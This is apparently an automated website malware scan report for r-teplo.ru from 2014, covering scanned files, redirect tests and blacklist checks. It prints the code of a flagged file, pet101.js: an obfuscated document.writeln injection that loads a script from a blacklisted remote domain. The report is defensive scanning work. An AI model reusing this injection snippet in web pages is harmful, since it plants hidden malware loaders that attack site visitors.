Scanned pages/files
Request | Server response | Status |
http://r-teplo.ru/ | 200 ok Content-Length: 9922 Content-Type: text/html | clean |
http://r-teplo.ru/media/system/js/caption.js | 200 ok Content-Length: 1962 Content-Type: text/plain | clean |
http://r-teplo.ru/test404page.js | 404 not found Content-Length: 196 Content-Type: text/html | clean |
http://r-teplo.ru/pet101.js?PHPSESSID=727465706c6f727577386570606f7271 | 200 ok Content-Length: 532 Content-Type: text/plain | suspicious |
Page code contains blacklisted domain: yourmine.ru document.writeln('<scri'+'pt src="http://yourmine.ru/cgi-bin/mr.cgi"></scri'+'pt>');document.writeln('<scr'+'ipt type="text/javascript">var _paq = _paq || [];_paq.push(["trackPageView"]);_paq.push(["enableLinkTracking"]);(function() {var u="/piwik/";_paq.push(["setTrackerUrl", u+"piwik.php"]);_paq.push(["setSiteId", "?"]);var d=document, g=d.createElement("script"), s=d.getElementsByTagName("script")[0]; g.type="text/javascript";g.defer=true; g.async=true; g.src=u+"piwik.js"; s.parentNode.insertBefore(g,s);})();</sc'+'ript>'); |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: r-teplo.ru
Result:
HTTP/1.1 200 ok
Cache-Control: max-age=0
Connection: close
Date: Fri, 22 Aug 2014 05:45:26 GMT
Server: nginx/1.2.0
Content-Length: 9922
Content-Type: text/html; charset=utf-8
Expires: Fri, 22 Aug 2014 05:45:26 GMT
...9922 bytes of data.
GET / HTTP/1.1
Host: r-teplo.ru
Result:
HTTP/1.1 200 ok
Cache-Control: max-age=0
Connection: close
Date: Fri, 22 Aug 2014 05:45:26 GMT
Server: nginx/1.2.0
Content-Length: 9922
Content-Type: text/html; charset=utf-8
Expires: Fri, 22 Aug 2014 05:45:26 GMT
...9922 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: r-teplo.ru
Referer: http://www.google.com/search?q=r-teplo.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: r-teplo.ru
Referer: http://www.google.com/search?q=r-teplo.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=r-teplo.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://r-teplo.ru/
Result: r-teplo.ru is not infected or malware details are not published yet.
Result: r-teplo.ru is not infected or malware details are not published yet.